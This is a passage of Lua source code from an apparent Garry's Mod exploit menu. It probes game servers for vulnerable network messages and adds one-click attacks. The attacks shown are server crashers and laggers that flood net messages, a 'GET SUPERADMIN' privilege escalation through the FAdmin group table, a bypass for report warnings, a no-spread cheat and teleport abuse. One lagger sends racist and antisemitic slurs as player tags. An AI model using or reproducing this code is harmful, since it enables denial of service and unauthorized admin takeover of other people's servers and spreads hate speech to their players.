!timer.Exists( "crasher3" ) then timer.Create("crasher3", 0.5, 0, function() for i=1, 2000 do net.Start("Morpheus.StaffTracker") net.SendToServer() end end) SploitNotify("Crashing Server") else timer.Remove("crasher3") SploitNotify( "Canceling Crasher" ) end end);end local status = ValidNetString("egg") if (status) then SploitText("Found exploitable net message: egg") addExploit( "34","Get Easter Egg", "ez eggs", function() surface.PlaySound("garrysmod/ui_click.wav") net.Start("egg") net.SendToServer() SploitNotify("Gave Easter Egg") end);end local status = ValidNetString("TalkIconChat") if (status) then spoofchat = 0 SploitText("Found exploitable net message: TalkIconChat") addExploit( "35","Spoof Chat Icon", "not really a big exploit just fun", function() surface.PlaySound("garrysmod/ui_click.wav") if spoofchat == 0 then hook.Remove('StartChat', 'TalkIcon') net.Start("TalkIconChat") net.WriteBool(true) net.SendToServer() spoofchat = 1 SploitNotify("Enabled Icon Spoofer") else net.Start("TalkIconChat") net.WriteBool(false) net.SendToServer() SploitNotify("Disabled Icon Spoofer") spoofchat = 0 end end);end local status = ValidNetString("join_disconnect") if (status) then SploitText("Found exploitable net message: join_disconnect") addExploit( "36","Lagger #11", "b1g lags my duder", function() surface.PlaySound("garrysmod/ui_click.wav") if !timer.Exists( "lagger11" ) then timer.Create("lagger11", 0.5, 0, function() for i=1, 3000 do net.Start("join_disconnect") net.WriteEntity(table.Random(player.GetAll())) net.SendToServer() end end) SploitNotify("Starting Lagger") else timer.Remove("lagger11") SploitNotify("Stopping Lagger") end end);end local status = ValidNetString("pplay_deleterow") if (status) then SploitText("Found exploitable net message: pplay_deleterow") addExploit( "37","GET SUPERADMIN", "Rejoin game after clicking", function() surface.PlaySound("garrysmod/ui_click.wav") local id = LocalPlayer():SteamID() local tbl = {} = "FAdmin_PlayerGroup" tbl.where = { "steamid", tostring(id) } net.Start("pplay_deleterow") net.WriteTable(tbl) net.SendToServer() local tbl = {} tbl.tblname = "FAdmin_PlayerGroup" tbl.tblinfo = { tostring(id), "superadmin" } net.Start("pplay_addrow") net.WriteTable(tbl) net.SendToServer() SploitNotify("promotion ;)") end);end -- ttt report bypass by daddy grampa local title = "You have been reported! Please answer all your reports." local function CheckChild(pan) if !pan || !IsValid(pan) then return end if pan.GetTitle && pan:GetTitle() == title then pan:Remove(); print("Removed warning box") return end for k,v in pairs(pan:GetChildren()) do if v.GetTitle && v:GetTitle() == title then v:Remove(); print("Removed warning box") return end if #v:GetChildren() > 0 then CheckChild(v) end end end if (engine.ActiveGamemode() == "terrortown") then local bypass = 0 SploitText("Found exploitable gamemode: terrortown") addExploit( "38","Toggle TTT Report Bypass", "b1g bypass amirite", function() surface.PlaySound("garrysmod/ui_click.wav") if (bypass == 0) then hook.Add("Think", "remove_ttt_report", function() local pan = vgui.GetHoveredPanel() CheckChild(pan) end) SploitNotify("Enabled Report Bypass") local bypass = 1 else hook.Remove("Think", "remove_ttt_report") SploitNotify("Disabled Report Bypass") local bypass = 0 end end);end local status = ValidNetString("EZS_PlayerTag") if (status) then SploitText("Found exploitable net message: EZS_PlayerTag") addExploit( "39","Lagger #12", "b1g lags my duder", function() surface.PlaySound("garrysmod/ui_click.wav") if !timer.Exists( "lagger12" ) then timer.Create("lagger12", 0.5, 0, function() for k, v in pairs(player.GetAll()) do net.Start( "EZS_PlayerTag" ) net.WriteEntity(v) net.WriteString("I hate niggers") net.SendToServer() timer.Simple(2, function() net.Start( "EZS_PlayerTag" ) net.WriteEntity(v) net.WriteString("I hate jews") net.SendToServer() end) end end) SploitNotify("Starting Lagger") else timer.Remove("lagger12") SploitNotify("Stopping Lagger") end end);end if ConVarExists("advttt_spreadovertime_enabled") then SploitText("Found exploitable hook: WyoziAdvTTTSpreadOverTime") addExploit( "40","Remove Spread", "pSilent No Spread", function() surface.PlaySound("garrysmod/ui_click.wav") hook.Remove("PlayerTick", "WyoziAdvTTTSpreadOverTime") SploitNotify("Spread Removed") end);end local status = ValidNetString("ATS_WARP_FROM_CLIENT") if (status) then SploitText("Found exploitable net message: ATS_WARP_FROM_CLIENT") addExploit( "41", "Teleport", "Specify a string destination and u will be tped to it", function() inputFrame3Exists = true inputFrame3 = vgui.Create( "DFrame" ) inputFrame3:SetTitle("Type a String Destination") inputFrame3:SetSize( 400, 75 ) inputFrame3:SetPos(ScrW() / 2 - inputFrame3:GetWide() / 2, ScrH() / 2 + 230 ) inputFrame3:SetDraggable(false) inputFrame3:ShowCloseButton(false) inputFrame3:MakePopup() inputFrame3.Paint = function( self, w, h ) draw.RoundedBox( 5, 0, 0, w, h, Color(30, 30, 30)) end local TextEntry3 = vgui.Create( "DTextEntry", inputFrame3 ) TextEntry3:SetSize( 380, 30 ) TextEntry3:SetPos( inputFrame3:GetWide() / 2 - TextEntry3:GetWide() / 2, inputFrame3:GetTall() / 2 - TextEntry3:GetTall() / 2 ) TextEntry3:SetText( "*destination*" ) TextEntry3.OnEnter = function( self ) surface.PlaySound("garrysmod/ui_click.wav") SploitNotify("Teleporting to " .. TextEntry3:GetValue() ) net.Start( "ATS_WARP_FROM_CLIENT" ) net.WriteEntity( LocalPlayer() ) net.WriteString( TextEntry3:GetValue() ) net.SendToServer() inputFrame3:SetVisible(false) end end) end /* local status = ValidNetString("TCBuyAmmo") if (status) then addExploit( "2","Free Ammo", "Gets All Ammo Types", function() surface.PlaySound("garrysmod/ui_click.wav") SploitText("Getting Le Ammo") end);end */ concommand.Add("exploits_open", function() Main:SetVisible(true) Main:MakePopup() Main:MoveTo( ScrW() / 2 - Main:GetWide() / 2, ScrH() / 2 - Main:GetTall() / 2, .4, 0, -1) end) closebutton.DoClick = function() Main:SetMouseInputEnabled(false) Main:SetKeyBoardInputEnabled(false) if (inputFrameExists) then inputFrame:SetVisible(false) end if (inputFrame2Exists) then inputFrame2:SetVisible(false) end Main:MoveTo( ScrW() / 2 - Main:GetWide() / 2, ScrH(), .4, 0, -1, function() Main:SetVisible(false) end) end